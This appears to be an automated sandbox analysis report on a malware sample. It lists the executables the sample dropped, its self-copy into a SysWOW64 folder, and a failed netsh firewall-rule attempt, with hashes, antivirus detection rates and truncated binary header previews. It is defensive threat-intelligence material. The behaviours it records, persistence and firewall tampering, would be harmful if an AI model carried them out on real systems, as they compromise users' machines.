                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....usZ...............2.....\...............0....@.........................................................................lq......................................................................................pt..<............................code...~8.......:.................. ..`.text...B....P.......>.............. ..`.rdata...3...0...4..................@..@.data........p.......J..............@....rsrc................\..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\60C2.exe
                                                                                                                                                                                                            Process:C:\Windows\explorer.exe
                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):301056
                                                                                                                                                                                                            Entropy (8bit):5.192330972647351
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:4/ls8LAAkcooHqeUolNx8IA0ZU3D80T840yWrxpzbgqruJnfed:Ils8LA/oHbbLAGOfT8auzbgwuJG
                                                                                                                                                                                                            MD5:277680BD3182EB0940BC356FF4712BEF
                                                                                                                                                                                                            SHA1:5995AE9D0247036CC6D3EA741E7504C913F1FB76
                                                                                                                                                                                                            SHA-256:F9F0AAF36F064CDFC25A12663FFA348EB6D923A153F08C7CA9052DCB184B3570
                                                                                                                                                                                                            SHA-512:0B777D45C50EAE00AD050D3B2A78FA60EB78FE837696A6562007ED628719784655BA13EDCBBEE953F7EEFADE49599EE6D3D23E1C585114D7AECDDDA9AD1D0ECB
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                            • Antivirus: Metadefender, Detection: 46%, Browse
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 77%
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2t..v.i.v.i.v.i.hG..i.i.hG....i.hG..[.i.Q...q.i.v.h...i.hG..w.i.hG..w.i.hG..w.i.Richv.i.........PE..L.....b_.............................-.......0....@.......................... ...............................................e..P....................................2.............................. Y..@............0...............................text............................... ..`.rdata..D?...0...@..."..............@..@.data...X....p...$...b..............@....rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\6674.exe
                                                                                                                                                                                                            Process:C:\Windows\explorer.exe
                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3570176
                                                                                                                                                                                                            Entropy (8bit):7.997630766149595
                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                            SSDEEP:98304:Eyu1PF0IdV1/b4gfya9kofb/4rosp08oUPQH:EjtFp/tfyOTQrosGrUP0
                                                                                                                                                                                                            MD5:DDC599DB99362A7D8642FC19ABE03871
                                                                                                                                                                                                            SHA1:11199134356D8DE145D2EE22AAC37CA8AABA8A0B
                                                                                                                                                                                                            SHA-256:5D94F66FD3315E847213E16E19DFEB008B020798CFFF1334D48AC3344B711F22
                                                                                                                                                                                                            SHA-512:E35DBE56828E804AA78FE436E1717C3A09C416DBE2873FFFC9B44393E7EC2336CE9C544E4D6011C58E7E706819AEABC027AF9A85AA2A2509BDFC39699560ABFD
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 46%
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....O.a.................$...................@....@.......................... T.....b.6.....................................|lO. .....M...................................................................................................................... ..........................@................0......................@...........&....@......................@................0......................@............1...P......................@............02......./.................@....rsrc.........M......40.............@....T3QbYgM.....`O.......1.............@....adata........T......z6.............@...........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\7063.exe
                                                                                                                                                                                                            Process:C:\Windows\explorer.exe
                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):327680
                                                                                                                                                                                                            Entropy (8bit):5.555665914483739
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:QOWFvVSz4X34ToHWGPOeh20XTF2xi69YPUy0ZPv4J3vfrhVggjcGkNIVqI:QO0sMITBsh20XTIp6M5Pv4tX7ITsq
                                                                                                                                                                                                            MD5:3754DB9964B0177B6E905999B6F18FD7
                                                                                                                                                                                                            SHA1:F47B3FCF01C76AF3B174792519D44171413D25AE
                                                                                                                                                                                                            SHA-256:F56B4C870E0B40ED1BF4F1019346F14443BBE8608D6F75ACB92B176D138F74B7
                                                                                                                                                                                                            SHA-512:8BF6439AD6FDC8A8F48F4520FB33A4D69E014BFB70EE3E691DBC611ACA11F1FE2C4B0D3901176455E6D46B8AA661B21C93069E0ABAF78DC93284935E866B29FA
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%l,9a.Bja.Bja.Bj._.j|.Bj._.j..Bj._.jO.BjF.9jb.Bja.Cj..Bj._.j`.Bj._.j`.Bj._.j`.BjRicha.Bj................PE..L....,._................. ...\......`3.......0....@.................................w...........................................(....................................1...............................s..@............0...............................text............ .................. ..`.rdata..nY...0...Z...$..............@..@.data................~..............@....rsrc................"..............@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\8008.exe
                                                                                                                                                                                                            Process:C:\Windows\explorer.exe
                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):905216
                                                                                                                                                                                                            Entropy (8bit):7.399713113456654
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12288:KoXpNqySLyUDd48BpBIfj2ucA0ZeEbVkw+lMbguodE1z0oLxCZJ9tzj8kpcunn:KoO9FDZpBIMR/4Mzv2Jnp
                                                                                                                                                                                                            MD5:852D86F5BC34BF4AF7FA89C60569DF13
                                                                                                                                                                                                            SHA1:C961CCD088A7D928613B6DF900814789694BE0AE
                                                                                                                                                                                                            SHA-256:2EAA2A4D6C975C73DCBF251EA9343C4E76BDEE4C5DDA8D4C7074078BE4D7FC6F
                                                                                                                                                                                                            SHA-512:B66B83D619A242561B2A7A7364428A554BB72CCC64C3AC3F28FC7C73EFE95C7F9F3AC0401116AE6F7B41B960C323CC3B7ADAC782450013129D9DEC49A81DCEC7
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 63%
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................g.....q.I....v....h......E....x.....f.....c...Rich..................PE..L....[._................. ...2.......0.......0....@..........................P|......q......................................Xf..(....p.. ............................1..............................@Y..@............0...............................text............ .................. ..`.rdata.."?...0...@...$..............@..@.data...8....p.......d..............@....rsrc... .n..p......................@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\8B25.exe
                                                                                                                                                                                                            Process:C:\Windows\explorer.exe
                                                                                                                                                                                                            File Type:MS-DOS executable
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):557664
                                                                                                                                                                                                            Entropy (8bit):7.687250283474463
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12288:fWxcQhhhhhn8bieAtJlllLtrHWnjkQrK8iBHZkshvesxViA9Og+:fWZhhhhhUATlLtrUbK8oZphveoMA9
                                                                                                                                                                                                            MD5:6ADB5470086099B9169109333FADAB86
                                                                                                                                                                                                            SHA1:87EB7A01E9E54E0A308F8D5EDFD3AF6EBA4DC619
                                                                                                                                                                                                            SHA-256:B4298F77E454BD5F0BD58913F95CE2D2AF8653F3253E22D944B20758BBC944B4
                                                                                                                                                                                                            SHA-512:D050466BE53C33DAAF1E30CD50D7205F50C1ACA7BA13160B565CF79E1466A85F307FE1EC05DD09F59407FCB74E3375E8EE706ACDA6906E52DE6F2DD5FA3EDDCD
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview: MZ.....o...g.'.:.(3...32.....f.....C'B{b.........+..R...d:.....Q..............................................................................................................................................................................................PE..L....5...............0..$...*........... ...`....@..........................0.......@....@..................................p..........P)...........................................................................................................idata...`.............................`.pdata.......p......................@....rsrc...P)......0...................@..@.didata..........x..................@.....................................................................................................................................................................................................................................................................................................................g..L.r9..v9.<iP.hL[Kc...",..
                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\9874.exe
                                                                                                                                                                                                            Process:C:\Windows\explorer.exe
                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):354816
                                                                                                                                                                                                            Entropy (8bit):7.859676161369944
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6144:ezBkLL2NTBY2j1gmB0cR8zGnIu4TBJCb2WefmJwJS6jbMXC3DvMk7y:eKyNTa25ccRPIu49JmYt3jbM/
                                                                                                                                                                                                            MD5:DF7952A5FC82DFB2E49AE81B6A1BE135
                                                                                                                                                                                                            SHA1:4F3A8CD939FBE37426EFDA7C88FBD2E49D8F8986
                                                                                                                                                                                                            SHA-256:F04B77C60C896B33ED8FE286DE3341FC3FFD0211A987435475DC7E9D0ABCB0CC
                                                                                                                                                                                                            SHA-512:96A495E5D30E66A236C0AEA19DAEDF95B31F254E457647B6553F2D6CAE117F0A6DA2468550333FBAE3FFA94D0960E2459D2259D3B4C2598EFE49FC03E6C36F1A
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....usZ...............2.....^............... ....@.........................................................................ta..........4...........................................................................hd..,............................code....7.......8.................. ..`.text........P.......<.............. ..`.rdata...3... ...4..................@..@.data...$....`.......@..............@....rsrc...4............R..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\A8FB.exe
                                                                                                                                                                                                            Process:C:\Windows\explorer.exe
                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):313344
                                                                                                                                                                                                            Entropy (8bit):5.397613918503412
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:ioeQ4Ktj7h8X34vZHWVMC5QNPoT7iilkIexZ41BorVggjcGkNIVqI:recF4Iv0VM457i6E7ITsq
                                                                                                                                                                                                            MD5:2650E6FA017E57264E55CB0078639A13
                                                                                                                                                                                                            SHA1:8677721B6968EA494C69DFFE61E0E34FAF166EB6
                                                                                                                                                                                                            SHA-256:A004E459F0B6F2103369F14E80E3BCD7B16098AFAC311A5C42B5C72E61492475
                                                                                                                                                                                                            SHA-512:1D793F7CAF1AEC58EA24F173984C8BDC4891E93B5F07FC743C4921EF553520CCE80DDC8AC10E0F8A36CFBE190EEAE012C8FA8A9FB8963BF4EB666469C3049C63
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%l,9a.Bja.Bja.Bj._.j|.Bj._.j..Bj._.jO.BjF.9jb.Bja.Cj..Bj._.j`.Bj._.j`.Bj._.j`.BjRicha.Bj................PE..L....H._................. ...$......`3.......0....@..........................@......?...........................................(....`...............................1...............................s..@............0...............................text............ .................. ..`.rdata..nY...0...Z...$..............@..@.data...8........l...~..............@....rsrc........`......................@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\B3BA.exe
                                                                                                                                                                                                            Process:C:\Windows\explorer.exe
                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                            Category:modified
                                                                                                                                                                                                            Size (bytes):537088
                                                                                                                                                                                                            Entropy (8bit):5.840438491186833
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12288:SV2DJxKmQESnLJYydpKDDCrqXSIXcZD0sgbxRo:nK1vVYcZyXSY
                                                                                                                                                                                                            MD5:D7DF01D8158BFADDC8BA48390E52F355
                                                                                                                                                                                                            SHA1:7B885368AA9459CE6E88D70F48C2225352FAB6EF
                                                                                                                                                                                                            SHA-256:4F4D1A2479BA99627B5C2BC648D91F412A7DDDDF4BCA9688C67685C5A8A7078E
                                                                                                                                                                                                            SHA-512:63F1C903FB868E25CE49D070F02345E1884F06EDEC20C9F8A47158ECB70B9E93AAD47C279A423DB1189C06044EA261446CAE4DB3975075759052D264B020262A
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?y*...............0..*...........I... ...`....@.. ....................................@.................................`I..K....`............................................................................... ............... ..H............text....)... ...*.................. ..`.rsrc........`.......,..............@....reloc...............0..............@..B.................I......H............?..........hX..}............................................(....*..0..,.......(d...8....*.~....u....s....z&8.........8........................*.......*....(d...(....*...j*.......*.......*.......*.......*....(....*.~(....(^...8....*(.........8........*.......*.......*.......*.......*....0.............*.0.............*....*.......*.......*....(....*..0.............*....*....0.............*.(....z.A.........z.A.......................*.......*.......*.......*.......
                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\szdcdkt.exe
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\A8FB.exe
                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):14635008
                                                                                                                                                                                                            Entropy (8bit):6.362637600237045
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12288:2JF4Iv4Ni6E7070707070707070707070707070707070707070707070707070j:eF4Iv4Ni
                                                                                                                                                                                                            MD5:F23C1D7C6806E4BFAA8ABAD7CCC77AC1
                                                                                                                                                                                                            SHA1:2EC703653583A824814910985FA858CE464A1847
                                                                                                                                                                                                            SHA-256:77910D7DDF21BEB55CEABBAA66733A0AB89E7A6ACCD1474207F38AE7E793EFCE
                                                                                                                                                                                                            SHA-512:8DD2A8421137E98CD1C64EC1FF1E54D247A93D6573D1CADFAF332693481ECFF5E48021CB3623FF801366D4763DC20E2A4F93ECF72F90198CB04D8B4A1DE5A6FB
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%l,9a.Bja.Bja.Bj._.j|.Bj._.j..Bj._.jO.BjF.9jb.Bja.Cj..Bj._.j`.Bj._.j`.Bj._.j`.BjRicha.Bj................PE..L....H._................. ...$......`3.......0....@..........................@......?...........................................(....`...............................1...............................s..@............0...............................text............ .................. ..`.rdata..nY...0...Z...$..............@..@.data...8........l...~..............@....rsrc........`...f..................@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\ujhcrda
                                                                                                                                                                                                            Process:C:\Windows\explorer.exe
                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):284672
                                                                                                                                                                                                            Entropy (8bit):5.09851739034015
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:AbxI6T6jY7wdRLjumseo44+9acMUpK5XVFR5+zcXXGO1Z6S9daWrxpzbgqru:AbxRx4d8XVFn7W6/muzbgwu
                                                                                                                                                                                                            MD5:EB023C854D3C8A24589E9294FD5D346E
                                                                                                                                                                                                            SHA1:699EB8E25FCD583774381B9FF554C7E8442C8C43
                                                                                                                                                                                                            SHA-256:B602AFD3F94C5820291F8319B23F20E5254212BA6AAB49BE0238D7067CACA7B8
                                                                                                                                                                                                            SHA-512:9D20183622A2BA8E59FD6FC3F8F361DA2C258D040EDE68844ED65303E3EE1AAA5B4DF1C6A2AF13A1A0162FAAB9C23C4577963EF4B5F2601AE8516D26B0E96B17
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................g.....q.I....v....h......E....x.....f.....c...Rich..................PE..L......_.................$...........4.......@....@.........................................................................hv..(....... ............................A..............................@i..@............@...............................text...#".......$.................. ..`.rdata..2?...@...@...(..............@..@.data...x........"...h..............@....rsrc... ...........................@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\ujhcrda:Zone.Identifier
                                                                                                                                                                                                            Process:C:\Windows\explorer.exe
                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):26
                                                                                                                                                                                                            Entropy (8bit):3.95006375643621
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview: [ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                            C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                                                                                                                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):55
                                                                                                                                                                                                            Entropy (8bit):4.306461250274409
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                                                                            MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                                                                            SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                                                                            SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                                                                            SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                                                                                                                            C:\Windows\SysWOW64\uuqefjyt\szdcdkt.exe (copy)
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):14635008
                                                                                                                                                                                                            Entropy (8bit):6.362637600237045
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12288:2JF4Iv4Ni6E7070707070707070707070707070707070707070707070707070j:eF4Iv4Ni
                                                                                                                                                                                                            MD5:F23C1D7C6806E4BFAA8ABAD7CCC77AC1
                                                                                                                                                                                                            SHA1:2EC703653583A824814910985FA858CE464A1847
                                                                                                                                                                                                            SHA-256:77910D7DDF21BEB55CEABBAA66733A0AB89E7A6ACCD1474207F38AE7E793EFCE
                                                                                                                                                                                                            SHA-512:8DD2A8421137E98CD1C64EC1FF1E54D247A93D6573D1CADFAF332693481ECFF5E48021CB3623FF801366D4763DC20E2A4F93ECF72F90198CB04D8B4A1DE5A6FB
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%l,9a.Bja.Bja.Bj._.j|.Bj._.j..Bj._.jO.BjF.9jb.Bja.Cj..Bj._.j`.Bj._.j`.Bj._.j`.BjRicha.Bj................PE..L....H._................. ...$......`3.......0....@..........................@......?...........................................(....`...............................1...............................s..@............0...............................text............ .................. ..`.rdata..nY...0...Z...$..............@..@.data...8........l...~..............@....rsrc........`...f..................@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            C:\Windows\appcompat\Programs\Amcache.hve
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1572864
                                                                                                                                                                                                            Entropy (8bit):4.213486179721548
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12288:7dZYndbynSGWE6tqcojKt2Mr94xHkZIxa7V7v2E1IcBnKiJQqwz8ku:BZYndbynSGB6tq41h2aK
                                                                                                                                                                                                            MD5:313CF8C27BC5DDA4CB242376B4732F0E
                                                                                                                                                                                                            SHA1:D7F171568C1E393961C0C1FF820DDA9FE9AF79D9
                                                                                                                                                                                                            SHA-256:53C6C4ADCAD4E2B98FB4573938E6DE0E9EBA3D6C95ED53968CD315B91B682540
                                                                                                                                                                                                            SHA-512:E38AD7E812012D9695AACEC8DAAF8499113A37D2D28F320495B8D6D025932A495A7E6ABCC02EBE245CAC9A9779A6A45D0F6EF08D5CF041F34C8187DBCEDF768C
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview: regfV...V...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtmz@~r................................................................................................................................................................................................................................................................................................................................................".u/........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            C:\Windows\appcompat\Programs\Amcache.hve.LOG1
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):20480
                                                                                                                                                                                                            Entropy (8bit):3.45981995129144
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:9215sxIpnc8fTVgGUKZX7mnnOpuvU87WK:ULCSc8bVgG/ZXSnnO187W
                                                                                                                                                                                                            MD5:7C72645B82F488776CDCB444EC1BA98B
                                                                                                                                                                                                            SHA1:33E6AF1234407B8B26FD75643CE2E9A0E94948EF
                                                                                                                                                                                                            SHA-256:EE26950F8539C166BB61C27B24CE62EB70A9AF98E6256470BECFA13B56AC4248
                                                                                                                                                                                                            SHA-512:F5EF0ECB503B9DAD19EDAAB4DD1B1982CF29343B214CFED9E7CA966CC83B29CD8D4B1CE33C0EED8F4005870D2DCE33E469131D76E5CFA3882C55C9ACB10F6388
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview: regfU...U...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtmz@~r................................................................................................................................................................................................................................................................................................................................................$.u/HvLE.N......U.............mj....T_.N...................`... ..hbin................p.\..,..........nk,...r.................................... ...........................&...{ad79c032-a2ea-f756-e377-72fb9332c3ae}......nk ...r........ ........................... .......Z.......................Root........lf......Root....nk ...r.....................}.............. ...............*...............DeviceCensus........................vk..................WritePermissionsCheck.......p...
                                                                                                                                                                                                            \Device\ConDrv
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3773
                                                                                                                                                                                                            Entropy (8bit):4.7109073551842435
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:VHILZNfrI7WFY32iIiNOmV/HToZV9It199hiALlIg39bWA1RvTBi/g2eB:VoLr0y9iIiNOoHTou7bhBlIydWALLt2w
                                                                                                                                                                                                            MD5:DA3247A302D70819F10BCEEBAF400503
                                                                                                                                                                                                            SHA1:2857AA198EE76C86FC929CC3388A56D5FD051844
                                                                                                                                                                                                            SHA-256:5262E1EE394F329CD1F87EA31BA4A396C4A76EDC3A87612A179F81F21606ABC8
                                                                                                                                                                                                            SHA-512:48FFEC059B4E88F21C2AA4049B7D9E303C0C93D1AD771E405827149EDDF986A72EF49C0F6D8B70F5839DCDBD6B1EA8125C8B300134B7F71C47702B577AD090F8
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview: ..A specified value is not valid.....Usage: add rule name=<string>.. dir=in|out.. action=allow|block|bypass.. [program=<program path>].. [service=<service short name>|any].. [description=<string>].. [enable=yes|no (default=yes)].. [profile=public|private|domain|any[,...]].. [localip=any|<IPv4 address>|<IPv6 address>|<subnet>|<range>|<list>].. [remoteip=any|localsubnet|dns|dhcp|wins|defaultgateway|.. <IPv4 address>|<IPv6 address>|<subnet>|<range>|<list>].. [localport=0-65535|<port range>[,...]|RPC|RPC-EPMap|IPHTTPS|any (default=any)].. [remoteport=0-65535|<port range>[,...]|any (default=any)].. [protocol=0-255|icmpv4|icmpv6|icmpv4:type,code|icmpv6:type,code|.. tcp|udp|any (default=any)].. [interfacetype=wireless|lan|ras|any].. [rmtcomputergrp=<SDDL string>].. [rmtusrgrp=<SDDL string>].. [edge=yes|deferapp|deferuser|no (default=no)].. [security=authenticate|authenc|authdynenc|authnoencap|

                                                                                                                                                                                                            Static File Info

                                                                                                                                                                                                            General

                                                                                                                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Entropy (8bit):5.09851739034015
                                                                                                                                                                                                            TrID:
                                                                                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                            File name:0Cjy7Lkv1A.exe
                                                                                                                                                                                                            File size:284672
                                                                                                                                                                                                            MD5:eb023c854d3c8a24589e9294fd5d346e
                                                                                                                                                                                                            SHA1:699eb8e25fcd583774381b9ff554c7e8442c8c43
                                                                                                                                                                                                            SHA256:b602afd3f94c5820291f8319b23f20e5254212ba6aab49be0238d7067caca7b8
                                                                                                                                                                                                            SHA512:9d20183622a2ba8e59fd6fc3f8f361da2c258d040ede68844ed65303e3ee1aaa5b4df1c6a2af13a1a0162faab9c23c4577963ef4b5f2601ae8516d26b0e96b17
                                                                                                                                                                                                            SSDEEP:3072:AbxI6T6jY7wdRLjumseo44+9acMUpK5XVFR5+zcXXGO1Z6S9daWrxpzbgqru:AbxRx4d8XVFn7W6/muzbgwu
                                                                                                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................g.......q.I.....v......h..........E.....x.......f.......c.....Rich....................PE..L......_...........

                                                                                                                                                                                                            File Icon

                                                                                                                                                                                                            Icon Hash:a4fc36b6b694c6e2

                                                                                                                                                                                                            Static PE Info

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Entrypoint:0x403410
                                                                                                                                                                                                            Entrypoint Section:.text
